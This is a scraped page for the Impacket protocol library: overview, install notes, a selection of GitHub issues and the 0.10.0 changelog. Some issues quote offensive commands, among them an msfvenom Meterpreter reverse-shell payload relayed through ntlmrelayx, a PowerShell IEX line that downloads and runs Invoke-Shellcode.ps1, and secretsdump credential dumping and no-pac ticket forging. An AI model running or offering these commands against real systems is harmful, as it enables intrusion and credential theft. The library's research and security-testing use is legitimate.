Impacket is a collection of Python classes for working with network protocols.

SecureAuth Corporation

Last update: Jan 9, 2023

Related tags

Networking python smb wmi kerberos pass-the-hash impacket netbios dcom msrpc dcerpc

Overview

What is Impacket?

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

A description of some of the tools can be found at: https://www.secureauth.com/labs/open-source-tools/impacket

What protocols are featured?

Ethernet, Linux "Cooked" capture.
IP, TCP, UDP, ICMP, IGMP, ARP.
IPv4 and IPv6 Support.
NMB and SMB1, SMB2 and SMB3 (high-level implementations).
MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.
Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.
Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI, OXABREF, NSPI, OXNSPI.
Portions of TDS (MSSQL) and LDAP protocol implementations.

Getting Impacket

Setup

Quick start

Grab the latest stable release, unpack it and run python3 -m pip install . (python2 -m pip install . for Python 2.x) from the directory where you placed it. Isn't that easy?

Installing

In order to install the source execute the following command from the directory where the Impacket's distribution has been unpacked: python3 -m pip install . (python2 -m pip install . for Python 2.x). This will install the classes into the default Python modules path; note that you might need special permissions to write there.

Testing

If you want to run the library test cases you need to do mainly three things:

Install and configure a Windows 2012 R2 Domain Controller.
- Be sure the RemoteRegistry service is enabled and running.
Configure the dcetest.cfg file with the necessary information
Install tox (python3 -m pip install tox)

Once that's done, you can run tox and wait for the results. If all goes well, all test cases should pass. You will also have a coverage HTML report located at impacket/tests/htlmcov/index.html

Docker Support

Build Impacket's image:

  docker build -t "impacket:latest" .

Using Impacket's image:

  docker run -it --rm "impacket:latest"

Licensing

This software is provided under a slightly modified version of the Apache Software License. See the accompanying LICENSE file for more information.

SMBv1 and NetBIOS support based on Pysmb by Michael Teo.

Disclaimer

The spirit of this Open Source initiative is to help security researchers, and the community, speed up research and educational activities related to the implementation of networking protocols and stacks.

The information in this repository is for research and educational purposes and not meant to be used in production environments and/or as part of commercial products.

If you desire to use this code or some part of it for your own uses, we recommend applying proper security development life cycle and secure coding practices, as well as generate and track the respective indicators of compromise according to your needs.

Contact Us

Whether you want to report a bug, send a patch, or give some suggestions on this package, drop us a few lines at [email protected].

For security-related questions check our security policy.

Comments

ConstraintsIntersection error when trying to use wmiexec.py with -k -no-pass?

Hi all, after generating a golden ticket, I go to try and use the wmiexec.py example with the -k and -no-pass options, but I am getting a strange exception:

ConstraintsIntersection(ConstraintsIntersection(), ConstraintsUnion(SingleValueConstraint(11), SingleValueConstraint(13))) failed at: ValueConstraintError('ConstraintsUnion(SingleValueConstraint(11), SingleValueConstraint(13)) failed at: ValueConstraintError('all of (SingleValueConstraint(11), SingleValueConstraint(13)) failed for "15"',)',) at Integer

Did I generate my ticket incorrectly or something?

opened by msftsecurityteam 36
Failed to Authenticating to the target use smbrelayx & ntlmrelayx and upload file

Version impacket

v0.9.23.dev1+20201203.125520.aa0c78ad

Command line execution used

python3 smbrelayx.py -h 192.168.43.83 -e ./metasploit_payload.exe (virus.exe)

it same too if i use ntlmrelayx, eg: python3 ntlmrelayx.py -t 192.168.43.83 -e metasploit_payload.exe

Metasploit payload i create

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.231 LPORT=4444 -o metasploit_payload.exe (virus.exe)

Client version

windows 7

server version

kali linux 2020.4

Problem

Hey, i want to relay authenthication from the client to the server(attacker) but the client not relay the aunthentication. When i allow the SMB share on the client \192.168.43.231. It show the message :

Ok. now i want to test if the client can send the authentication. So if i able to capture it, yes, in that case i can deliver my metasploit_payload.exe to the target machine. But i can't capture the authentication. It show the message below:

Sorry this only a question, because i don't now how to fix it. I read many blog but i'm still can't find a solution.

opened by ricko2991 35
secretsdump.py - Error while calling getNextRow() (previously utf16 codec error)
Hi,

I'm having an issue with secretsdump.py on a ntds.dit file coming from a Windows Server 2016. When I run secretsdump.py on it:

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

It returns the following:

Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] Target system bootKey: 0xc03fcc27eb232e8cf9aedfe9dccb2af8 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [-] Error while calling getNextRow(), trying the next one

Previously, I was on the v.0.9.16-dev branch, and I had an utf16 codec error.

Impacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies [*] Target system bootKey: 0xc03fcc27eb232e8cf9aedfe9dccb2af8 [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [-] 'utf16' codec can't decode bytes in position 0-1: illegal encoding [*] Cleaning up...

Is it possible that Impacket isn't updated to support the extraction of ntds.dit files from a Windows Server 2016 yet? I can provide all the logs, and debugging data needed (minus the actual ntds.dit and SYSTEM files, obviously).

Thank you.
opened by Aurakal 35
STATUS_INVALID_PARAMETER while connecting to cifs server.

Hello,

I've been long time user of impacket lib for smb2/3 ops purpose.

I'm trying to connect to NetApp CIFS server using SMBConnection or SMB3 instance directly too.but i get invalid status error on below scenarios.

I see that Negotiate request/response went well. Negotiate response {{{ Frame 174: 284 bytes on wire (2272 bits), 284 bytes captured (2272 bits) Ethernet II, Src: HewlettP_d7:5e:c0 (00:9c:02:d7:5e:c0), Dst: Apple_c6:56:be (78:31:c1:c6:56:be) Internet Protocol Version 4, Src: 10.1.9.175, Dst: 10.2.5.12 Transmission Control Protocol, Src Port: 445, Dst Port: 64322, Seq: 1, Ack: 111, Len: 218 NetBIOS Session Service SMB2 (Server Message Block Protocol version 2) SMB2 Header Negotiate Protocol Response (0x00) StructureSize: 0x0041 Security mode: 0x01, Signing enabled Dialect: 0x0202 NegotiateContextCount: 0 Server Guid: 00000015-b63d-0da0-c778-844ebee2a553 Capabilities: 0x00000001, DFS Max Transaction Size: 65536 Max Read Size: 65536 Max Write Size: 65536 Current Time: Dec 1, 2016 11:41:05.799077000 EST Boot Time: Sep 12, 2016 10:53:20.891304000 EDT Security Blob: 605406062b0601050502a04a3048a024302206092a864882... Offset: 0x00000080 Length: 86 GSS-API Generic Security Service Application Program Interface OID: 1.3.6.1.5.5.2 (SPNEGO - Simple Protected Negotiation) Simple Protected Negotiation negTokenInit mechTypes: 3 items MechType: 1.2.840.48018.1.2.2 (MS KRB5 - Microsoft Kerberos 5) MechType: 1.2.840.113554.1.2.2 (KRB5 - Kerberos 5) MechType: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider) negHints hintName: server_name@domain_name <-- hided on purpose NegotiateContextOffset: 0x0000 }}}

Session setup request {{{ Frame 207: 224 bytes on wire (1792 bits), 224 bytes captured (1792 bits) Ethernet II, Src: Apple_c6:56:be (78:31:c1:c6:56:be), Dst: HewlettP_d7:5e:c0 (00:9c:02:d7:5e:c0) Internet Protocol Version 4, Src: 10.2.5.12, Dst: 10.1.9.175 Transmission Control Protocol, Src Port: 64322, Dst Port: 445, Seq: 111, Ack: 219, Len: 158 NetBIOS Session Service SMB2 (Server Message Block Protocol version 2) SMB2 Header Session Setup Request (0x01) StructureSize: 0x0019 Flags: 0 Security mode: 0x01, Signing enabled Capabilities: 0x00000001, DFS Channel: None (0x00000000) Previous Session Id: 0x0000000000000000 Security Blob: 604006062b0601050502a0363034a00e300c060a2b060104... Offset: 0x00000058 Length: 66 GSS-API Generic Security Service Application Program Interface OID: 1.3.6.1.5.5.2 (SPNEGO - Simple Protected Negotiation) Simple Protected Negotiation negTokenInit mechTypes: 1 item MechType: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider) mechToken: 4e544c4d5353500001000000078208200000000000000000... NTLM Secure Service Provider NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_NEGOTIATE (0x00000001) Negotiate Flags: 0x20088207, Negotiate 128, Negotiate Extended Security, Negotiate NTLM key, Request Target, Negotiate OEM, Negotiate UNICODE Calling workstation domain: NULL Calling workstation name: NULL }}}

Session setup response. {{{ Frame 208: 143 bytes on wire (1144 bits), 143 bytes captured (1144 bits) Ethernet II, Src: HewlettP_d7:5e:c0 (00:9c:02:d7:5e:c0), Dst: Apple_c6:56:be (78:31:c1:c6:56:be) Internet Protocol Version 4, Src: 10.1.9.175, Dst: 10.2.5.12 Transmission Control Protocol, Src Port: 445, Dst Port: 64322, Seq: 219, Ack: 269, Len: 77 NetBIOS Session Service SMB2 (Server Message Block Protocol version 2) SMB2 Header Server Component: SMB2 Header Length: 64 Credit Charge: 0 NT Status: STATUS_INVALID_PARAMETER (0xc000000d) Command: Session Setup (1) Credits granted: 0 Flags: 0x00000001, Response Chain Offset: 0x00000000 Message ID: 0 Process Id: 0x00000000 Tree Id: 0x00000000 Session Id: 0x0000000000000000 Signature: 00000000000000000000000000000000 [Response to: 207] [Time from request: 0.002369000 seconds] Session Setup Response (0x01) StructureSize: 0x0009 Session Flags: 0x0000 Security Blob: : NO DATA Offset: 0x00000000 Length: 0 }}}

Scenario : 1 NetApp server with SMB2 dialect, login fails. `{

c = SMBConnection(remoteName='netapp-server', remoteHost='10.1.9.175', myName=None, sess_port=445, preferredDialect=514) c.login("user1", "password1", "domain1") Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 264, in login raise SessionError(e.get_error_code()) SessionError: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)`

I connect to our private CIFS server successfully when i provide valid dialect. `{

c = SMBConnection(remoteName='local-1', remoteHost='10.1.29.12', myName=None, sess_port=445, preferredDialect=514) c.login("user1", "password1", "domain1") True c.getDialect() 514 <--- SMB2`

Scenario: 2 Local server: If i dont provide preferredDialect then it fails in negotiation step itself.

`{

c = SMBConnection(remoteName='local-1', remoteHost='10.1.29.12', myName=None, sess_port=445, preferredDialect=None) Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 74, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 118, in negotiateSession session=self._nmbSession, preferredDialect=514) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 242, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 458, in negotiateSession ans = self.recvSMB(packetID) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 381, in recvSMB data = self._NetBIOSSession.recv_packet(self._timeout) File "/usr/local/lib/python2.7/site-packages/impacket/nmb.py", line 854, in recv_packet data = self.__read(timeout) File "/usr/local/lib/python2.7/site-packages/impacket/nmb.py", line 932, in __read data = self.read_function(4, timeout) File "/usr/local/lib/python2.7/site-packages/impacket/nmb.py", line 921, in non_polling_read raise NetBIOSError, ('Error while reading from remote', ERRCLASS_OS, None) NetBIOSError: Error while reading from remote`

NetApp cifs server with no preferredDialect STATUS_INVALID_PARAMETER. So it actually reads from the socket but gets unexpected status in negotiation phase. `{

c = SMBConnection(remoteName='netapp-server', remoteHost='10.1.9.175', myName=None, sess_port=445, preferredDialect=None) Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 74, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smbconnection.py", line 118, in negotiateSession session=self._nmbSession, preferredDialect=514) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 242, in init self.negotiateSession(preferredDialect) File "/usr/local/lib/python2.7/site-packages/impacket/smb3.py", line 459, in negotiateSession if ans.isValidAnswer(STATUS_SUCCESS): File "/usr/local/lib/python2.7/site-packages/impacket/smb3structs.py", line 430, in isValidAnswer raise smb3.SessionError(self['Status'], self) SessionError: SMB SessionError: STATUS_INVALID_PARAMETER(An invalid parameter was passed to a service or function.)`

Settings on NetApp server {{{ netapp-server> options cifs.smb2 cifs.smb2.enable on cifs.smb2.signing.max_threads 0 cifs.smb2.signing.multiprocessing disabled cifs.smb2.signing.required off cifs.smb2_1.branch_cache.enable off cifs.smb2_1.branch_cache.hash_time_out 3600 (value might be overwritten in takeover) netapp-server> options cifs.signing cifs.signing.enable off }}}

I have compared pcap from mac/windows while connecting to cifs server using libsmb.py haven't found any field that is wrong or unexpected. I have also checked NTLMSSP flags and tried variations to see if there is any unsupported flag. but luck.

I can connect to same cifs servers from windows 7 using smb2.

Any help would be appreciated, where to look or if am i missing any setting on server side.

Thank you.

opened by contactr2m 31
Python3 support

We should add Python3 support for the library. Ideally, the same codebase should run on both versions.

I've just created a python3 branch to work on porting the existing code.

structure.py, which is a core component for the library, seems to be working on Python3 now. A lot of testing is needed tho.

PRs welcomed!
enhancement help wanted

opened by asolino 31
ntlmrelayx: socket ssl wrapping error
Hi!

I'm facing the issue when using relay for LDAPs traffic. Whole exception with -debug flug:

[-] Exception in HTTP request handler: ('unable to open socket', [(LDAPSocketOpenError('socket ssl wrapping error: [Errno 104] Connection reset by peer',), ('A.B.C.D', 636))]) [+] Traceback (most recent call last): File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 72, in handle_one_request SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(self) File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request method() File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 193, in do_GET if not self.do_ntlm_negotiate(token, proxy=proxy): File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/servers/httprelayserver.py", line 261, in do_ntlm_negotiate if not self.client.initConnection(): File "build/bdist.linux-x86_64/egg/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py", line 144, in initConnection self.session.open(False) File "/usr/local/lib/python2.7/dist-packages/ldap3/strategy/sync.py", line 56, in open BaseStrategy.open(self, reset_usage, read_server_info) File "/usr/local/lib/python2.7/dist-packages/ldap3/strategy/base.py", line 147, in open raise LDAPSocketOpenError('unable to open socket', exception_history) LDAPSocketOpenError: ('unable to open socket', [(LDAPSocketOpenError('socket ssl wrapping error: [Errno 104] Connection reset by peer',), ('A.B.C.D', 636))])

System:

Python 2.7.15+

up to date Kali

up to date impacket

ldap3 tested both 2.5.1 and 2.5.2

Same problem was slightly touched in #514, where @dirkjanm mentioned:

(..) it has something to do with whether the SSL certificates are set correctly on the server. Usually targeting another DC worked

I have access to ~12 AD systems (2012 R2 and 2016), targeting any of them results into this error. Connections using ldp.exe works well (along with many production calls to some of ADs):

LDAP signing not enabled:

Behavior is that LDAPs service RST connection just after TLS hello is received:

So this is not caused by ntlmrelayx not trusting LDAPs sertificate - it's about LDAPs refusing this TLS hello packet.

Any ideas?
opened by dtrizna 29

samrdump import issue

What steps will reproduce the problem?
1. Download the 0.9.9.9.9 version
2. run setup.py install
3. run samrdump.py <ip>

What is the expected output? What do you see instead?
The normal smb enumeration info are expected, but it returns:

Traceback (most recent call last):
  File "/usr/local/bin/samrdump.py", line 24, in <module>
    from impacket import uuid, version
ImportError: cannot import name version


What version of the product are you using? On what operating system?
The last one (impacket-0.9.9.9.tar.gz) - Linux Backtrack 5r3

Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 18 Jan 2013 at 1:57

opened by GoogleCodeExporter 27

add no-pac exploit attack (s4u2self only) and add service modification feature to examples/getST.py

I'm playing with no-pac exploitation recently, the last step is doing a s4u2self request, and we don't need to do s4u2proxy request. But I found that impacket's getST.py has no support for this, and it doesn't support service modification of the returned TGS ticket. Even there is a feature called AnySPN in impacket, but it won't work in this special situation here is the result of smbclient.py before my modification to getST.py

after I made some changes to getST.py, I'm able to get a service ticket with the SPN I specified in the command line

getST.py my.domain/WIN-ER6H1V81DV9 -no-pass -k -dc-ip 192.168.25.177 -impersonate Administrator -alt-service CIFS/WIN-ER6H1V81DV9.my.domain -s4u2self -spn WIN-ER6H1V81DV9 -debug smbclient.py works just fine

opened by wqreytuk 26
Review of NTLM reflection attack over network
HI all,

I'm a little bit confused of what are the options for a reflection attack (NTLM auth back to the victim which is different from a general relay attack) on an up-to-date W10 host. Let me explain what i have understand :

SMB NTLM auth reflect back to SMB is patched since 2008 (MS08-068)

NTLM auth reflect back to SMB (like HTTP => SMB) is patched since 2016. This was the goal of Hot Potato by @breenmachine

DCOM DCE (via BITS) to RPC endpoint (TCP port 135) is still working (RottenPotato by @breenmachine or lonelypotato by @decoder-it) Ok, but demo of these attacks is always done on the victim's host (loopback @IP). Well, my questions are:

Is it possible to manage these reflection attack (or another) over the local network on an fully update W10 host?

Does Impacket implement these attacks ? I know that @asolino and @dirkjanm discussed about it in an 2 years old issue (https://github.com/CoreSecurity/impacket/issues/188#issue-170611239) but conclusion was quite unclear for me.

Regards,

Rémi
opened by remi-cc 26
utf-8 issues with examples
Hello @asolino, I'll use this thread to report various utf-8 issues :)

Let's start with smbclient.py:

$ smbclient.py <login>:<pwd>@192.168.11.144 # shares ADMIN$ C$ IPC$ NETLOGON share SYSVOL àéyoloshare # cd àéyoloshare [-] 'utf8' codec can't decode byte 0x85 in position 3: invalid start byte

I know utf handling is a pain...That's a long struggle with CrackMapExec (hello @byt3bl33d3r) :)

Cheers !
bug help wanted
opened by maaaaz 25

smbserver: Connection reset by peer && command not implemented

Hey man!

I'm currently trying to download powershell scripts over smb on Windows 10 using the following command:

IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TMP/Invoke-Shellcode.ps1");

smbserver.py and my custom smb server class give me the following output:

2015-10-31 18:54:11 Config file parsed
2015-10-31 18:54:11 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-10-31 18:54:11 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-10-31 18:54:17 Incoming connection (172.16.112.130,51854)
2015-10-31 18:54:17 Not implemented command: 0x0
2015-10-31 18:54:17 Handle: [Errno 104] Connection reset by peer
2015-10-31 18:54:17 Closing down connection (172.16.112.130,51854)

Let me know if you need some additional information.

Cheers

opened by byt3bl33d3r 19

Add dissect.esedb compatibility to secretsdump

See #1448. I'm not sure how tightly integrated you'd want this to be in impacket, so I opted for a simple compatibility shim. This can of course be changed to a full replacement of the existing ESE implementation.

This should bring a considerable performance improvement to secretsdump. My sample AD with only 3 users already sees an improvement (1s vs 2s), but in the past we've seen domains with over 100k users take less than a minute, whereas the original secretsdump would take >24 hours.

@dirkjanm

https://github.com/fox-it/dissect.esedb

opened by Schamper 0
Feature: ntlmrelayx include --use-vss for secretsdump

During a client engagement I noticed that, when relaying a valid domain admin account to a domain controller (which has signing disabled) and attempting to dump credentials using secretsdump (default action when -c parameter is not specified), it fails for NTDS dit.

To fix this, I had to run socks and then run secretsdump using --use-vss. Any chance custom parameters can be included in ntlmrelayx when secretsdump is ran?

opened by KaynRO 0
Allow weak TLS ciphers for LDAP connections

In Python3.10, the default TLS cipher settings have been set to a more secure level. See: https://bugs.python.org/issue43998

The change makes sense for general users, but Impacket is regularly used to access old Windows computers that present certs signed using MD5 or don't support anything higher than TLSv1.0. Impacket users arguably care more about exploiting weaknesses than requiring super secure TLS settings, so this patch lowers the cipher settings to the lowest value. This is in line with the current behavior of not validating certificates at all.

Note that this will not help if the TLS handshake fails due to certificate issues until this bug is fixed in ldap3: https://github.com/cannatag/ldap3/pull/1067

opened by AdrianVollmer 0
secretsdump implementation with dissect.esedb

Hello @dirkjanm,

Now that the dissect module is open-source, what about publishing that exciting secretsdump code reimplementation improvement with that module ?

Cheers !

opened by maaaaz 6
Can't get Name property from MSCluster_Node, the output gets garbled

Configuration

impacket version: v0.10.0 Python version: Python 3.6.8 Target OS: WMI 6.3.9600 | 2012R2

Debug Output With Command String

/opt/python-virtualenv/impacket/bin/wmiquery.py -debug 'AD/USER:PASS@IP' -namespace root/mscluster -rpc-auth-level privacy -f <( echo 'SELECT Name FROM MSCluster_Node' ) Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[+] Impacket Library Installation Path: /opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket [+] Target system is SERVERIP and isFQDN is False [+] StringBinding: SERVERNAME[24158] [+] StringBinding: SERVERIP[24158] [+] StringBinding chosen: ncacn_ip_tcp:SERVERIP[24158] WQL> SELECT Name FROM MSCluster_Node Traceback (most recent call last): File "/usr/lib64/python3.6/cmd.py", line 214, in onecmd func = getattr(self, 'do_' + cmd) AttributeError: 'WMIQUERY' object has no attribute 'do_SELECT'

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "/opt/python-virtualenv/impacket/bin/wmiquery.py", line 84, in printReply pEnum = iEnum.Next(0xffffffff,1)[0] File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 2951, in Next oxid=self.get_oxid(), target=self.get_target()), self.__iWbemServices)) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 2328, in init self.encodingUnit = ENCODING_UNIT(objRef['pObjectData']) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 87, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 895, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 795, in init Structure.init(self, data, alignment) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 87, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 87, in init self.fromString(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 152, in fromString self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0]) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/structure.py", line 382, in unpack return dataClassOrCode(data) File "/opt/python-virtualenv/impacket/lib/python3.6/site-packages/impacket/dcerpc/v5/dcom/wmi.py", line 765, in init raise Exception("self['InstPropQualSetFlag'] == 2") Exception: ("self['InstPropQualSetFlag'] == 2", "When unpacking field 'InstancePropQualifierSet | : | b'\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5904]'", "When unpacking field 'InstanceQualifierSet | : | b'\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5908]'", "When unpacking field 'InstanceType | : | b'\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6161]'", "When unpacking field 'ObjectBlock | : | b'\x12\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6162]'") [-] ("self['InstPropQualSetFlag'] == 2", "When unpacking field 'InstancePropQualifierSet | : | b'\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5904]'", "When unpacking field 'InstanceQualifierSet | : | b'\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:5908]'", "When unpacking field 'InstanceType | : | b'\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6161]'", "When unpacking field 'ObjectBlock | : | b'\x12\xef\x05\x046\x07\x80\x01\x0b\xff\xff\x10\x03\t\x04\x06\x80\x08\x18-\x083\x01[a\x03\x93\x80MSCluster_NodeLocaleMS_CLUSTER_PROVIDERUUID{C306EBED-0654-4360-AA70-DE912C5FC364}Name\x08@\x1c\n\x80#\x08\x8b\x01\x803\x0b\xff\xffstringz\x10\x04\x02\x1e\x1f\x11\x08-7\x11\x03\x03E\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType\x1c\x02\x80MSCluster_NodeNODESERVER01PropertyNameNodeNamePropertyType'[:6162]'")

Additional context

It seem, when you try to get the Names of the nodes from MSCluster_Node class it breaks. It is only for the "Name" property. Thise where repalce to sanitize the output AD/USER:PASS@IP, SERVERIP, SERVERNAME, NODESERVERNAME, NODESERVER01. There was alot of "\x00" in the output that I removed to reduce it.

opened by Mysteoa 0

Releases(impacket_0_10_0)

impacket_0_10_0(May 4, 2022)
Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

ChangeLog for 0.10.0:

Library improvements

Dropped support for Python 2.7.

Refactored the testing infrastructure (@martingalloar):

Added pytest as the testing framework to organize and mark test cases. Tox remain as the automation framework, and Coverage.py for measuring code coverage.

Custom bash scripts were replaced with test cases auto-discovery.

Local and remote test cases were marked for easy run and configuration.

DCE/RPC endpoint test cases were refactored and moved to a new layout.

An initial testing guide with the main steps to prepare a testing environment and run them.

Fixed a good amount of DCE/RPC endpoint test cases that were failing.

Added tests for [MS-PAR], [MS-RPRN], CCache and DPAPI.

Added a function to compute the Netlogon Authenticator at client-side in [MS-NRPC] (@0xdeaddood)

Added [MS-DSSP] protocol implementation (@simondotsh)

Added GetDriverDirectory functions to [MS-PAR] and [MS-RPRN] (@raithedavion)

Refactored the Credential Cache:

Added new parseFile function to ccache.py (@rmaksimov)

Added support for loading CCache Version 3 (@reznok)

Modified fromKRBCRED function used to load a Kirbi file (@0xdeaddood)

Fixed Ccache to Kirbi conversion (@ShutdownRepo)

Fixed default NTLM server challenge in smbserver (@rtpt-jonaslieb)

Examples improvements

exchanger.py:

Fixed a bug when a Global Address List doesn't exist on the server (@mohemiv)

mimikatz.py

Updated intro to not trigger the AV on windows (@mpgn)

ntlmrelayx.py:

Implemented RAW Relay Server (@CCob)

Added an LDAP attack dumping information about the domain's ADCS enrollment services (@SAERXCIT)

Added multi-relay feature to the HTTP Relay Server. Now one incoming HTTP connection could be used against multiple targets (@0xdeaddood)

Added an option to disable the multi-relay feature (@zblurx and @0xdeaddood)

Added multiple HTTP listeners running at the same time (@SAERXCIT)

Support for the ADCS ESC1 and ESC6 attacks (@hugo-syn)

Added Shadow Credentials attack (@ShutdownRepo, @Tw1sm, @nodauf and @p0dalirius)

Added the ability to define a password for the LDAP attack addComputer (@ShutdownRepo)

Added rename_computer and modify add_computer in LDAP interactive shell (@capnkrunchy)

Implemented StartTLS (@ThePirateWhoSmellsOfSunflowers)

reg.py:

Added save function to allow remote saving of registry hives (@ShutdownRepo and @scopedsecurity)

secretsdump.py:

Added an option to dump credentials using the Kerberos Key List attack (@0xdeaddood)

smbpasswd.py:

Added an option to force credentials change via injecting new values into SAM (@snovvcrash and @Alef-Burzmali!)

New examples

machine_role.py: This script retrieves a host's role along with its primary domain details (@simondotsh)

